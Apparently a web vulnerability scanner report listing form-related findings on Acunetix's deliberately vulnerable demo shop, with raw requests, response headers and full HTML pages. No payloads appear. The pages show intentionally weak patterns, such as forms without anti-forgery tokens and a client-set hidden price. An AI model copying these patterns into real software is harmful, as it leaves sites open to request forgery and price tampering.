"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>login page</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- here goes headers headers --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <div class="story"> <h3>If you are already registered please enter your login information below:</h3><br> <form name="loginform" method="post" action="userinfo.php"> <table cellpadding="4" cellspacing="1"> <tr><td>Username : </td><td><input name="uname" type="text" size="20" style="width:120px;"></td></tr> <tr><td>Password : </td><td><input name="pass" type="password" size="20" style="width:120px;"></td></tr> <tr><td colspan="2" align="right"><input type="submit" value="login" style="width:75px;"></td></tr> </table> </form> </div> <div class="story"> <h3> You can also <a href="signup.php">signup here</a>.<br> Signup disabled. Please use the username <font color='red'>test</font> and the password <font color='red'>test</font>. </h3> </div> </div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/product.php?pic=1 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name='f_addcart' method='POST' action='cart.php'> |
Request Header - size: 291 bytes. |
GET http://testphp.vulnweb.com/product.php?pic=1 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/listproducts.php?cat=1 |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:17:06 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 6428 |
Response Body - size: 6,428 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>picture details</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <script language="javascript1.2"> <!-- function popUpWindow(URLStr, left, top, width, height) { window.open(URLStr, 'popUpWin', 'toolbar=no,location=no,directories=no,status=no,menub ar=no,scrollbar=no,resizable=no,copyhistory=yes,width='+width+',height='+height+',left='+left+', top='+top+',screenX='+left+',screenY='+top+''); } --> </script> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id='pageName'>The shore</h2><div class='story'><p><a href='showimage.php?file=./pictures/1.jpg' target='_blank'><img style='cursor:pointer' border='0' align='center' src='showimage.php?file=./pictures/1.jpg&size=160' width='160' height='100'></a><h3>Short description</h3><p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu.</p><h3>Long description</h3><p><p> This picture is an 53 cm x 12 cm masterpiece. </p> <p> This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information. </p></p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p>the price of this item is: $500</p></div><div class='story'><form name='f_addcart' method='POST' action='cart.php'><input type='hidden' name='price' value='500'><input type='hidden' name='addcart' value='1'><input type='submit' value='add this picture to cart'></form></div></div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/product.php?pic=1 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="search.php?test=query" method="post"> |
Request Header - size: 291 bytes. |
GET http://testphp.vulnweb.com/product.php?pic=1 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/listproducts.php?cat=1 |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:17:06 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 6428 |
Response Body - size: 6,428 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>picture details</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <script language="javascript1.2"> <!-- function popUpWindow(URLStr, left, top, width, height) { window.open(URLStr, 'popUpWin', 'toolbar=no,location=no,directories=no,status=no,menub ar=no,scrollbar=no,resizable=no,copyhistory=yes,width='+width+',height='+height+',left='+left+', top='+top+',screenX='+left+',screenY='+top+''); } --> </script> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id='pageName'>The shore</h2><div class='story'><p><a href='showimage.php?file=./pictures/1.jpg' target='_blank'><img style='cursor:pointer' border='0' align='center' src='showimage.php?file=./pictures/1.jpg&size=160' width='160' height='100'></a><h3>Short description</h3><p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu.</p><h3>Long description</h3><p><p> This picture is an 53 cm x 12 cm masterpiece. </p> <p> This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information. </p></p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p>the price of this item is: $500</p></div><div class='story'><form name='f_addcart' method='POST' action='cart.php'><input type='hidden' name='price' value='500'><input type='hidden' name='addcart' value='1'><input type='submit' value='add this picture to cart'></form></div></div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/product.php?pic=2 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name='f_addcart' method='POST' action='cart.php'> |
Request Header - size: 291 bytes. |
GET http://testphp.vulnweb.com/product.php?pic=2 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/listproducts.php?cat=1 |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:17:07 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 6368 |
Response Body - size: 6,368 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>picture details</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <script language="javascript1.2"> <!-- function popUpWindow(URLStr, left, top, width, height) { window.open(URLStr, 'popUpWin', 'toolbar=no,location=no,directories=no,status=no,menub ar=no,scrollbar=no,resizable=no,copyhistory=yes,width='+width+',height='+height+',left='+left+', top='+top+',screenX='+left+',screenY='+top+''); } --> </script> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id='pageName'>Mistery</h2><div class='story'><p><a href='showimage.php?file=./pictures/2.jpg' target='_blank'><img style='cursor:pointer' border='0' align='center' src='showimage.php?file=./pictures/2.jpg&size=160' width='160' height='100'></a><h3>Short description</h3><p>Donec molestie. Sed aliquam sem ut arcu.</p><h3>Long description</h3><p><p> This picture is an 53 cm x 12 cm masterpiece. </p> <p> This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information. </p></p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p>the price of this item is: $800</p></div><div class='story'><form name='f_addcart' method='POST' action='cart.php'><input type='hidden' name='price' value='800'><input type='hidden' name='addcart' value='2'><input type='submit' value='add this picture to cart'></form></div></div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/product.php?pic=2 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="search.php?test=query" method="post"> |
Request Header - size: 291 bytes. |
GET http://testphp.vulnweb.com/product.php?pic=2 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/listproducts.php?cat=1 |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:17:07 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 6368 |
Response Body - size: 6,368 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>picture details</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <script language="javascript1.2"> <!-- function popUpWindow(URLStr, left, top, width, height) { window.open(URLStr, 'popUpWin', 'toolbar=no,location=no,directories=no,status=no,menub ar=no,scrollbar=no,resizable=no,copyhistory=yes,width='+width+',height='+height+',left='+left+', top='+top+',screenX='+left+',screenY='+top+''); } --> </script> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id='pageName'>Mistery</h2><div class='story'><p><a href='showimage.php?file=./pictures/2.jpg' target='_blank'><img style='cursor:pointer' border='0' align='center' src='showimage.php?file=./pictures/2.jpg&size=160' width='160' height='100'></a><h3>Short description</h3><p>Donec molestie. Sed aliquam sem ut arcu.</p><h3>Long description</h3><p><p> This picture is an 53 cm x 12 cm masterpiece. </p> <p> This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information. </p></p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p>the price of this item is: $800</p></div><div class='story'><form name='f_addcart' method='POST' action='cart.php'><input type='hidden' name='price' value='800'><input type='hidden' name='addcart' value='2'><input type='submit' value='add this picture to cart'></form></div></div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/product.php?pic=3 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name='f_addcart' method='POST' action='cart.php'> |
Request Header - size: 291 bytes. |
GET http://testphp.vulnweb.com/product.php?pic=3 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/listproducts.php?cat=1 |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:17:08 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 6401 |
Response Body - size: 6,401 bytes. |
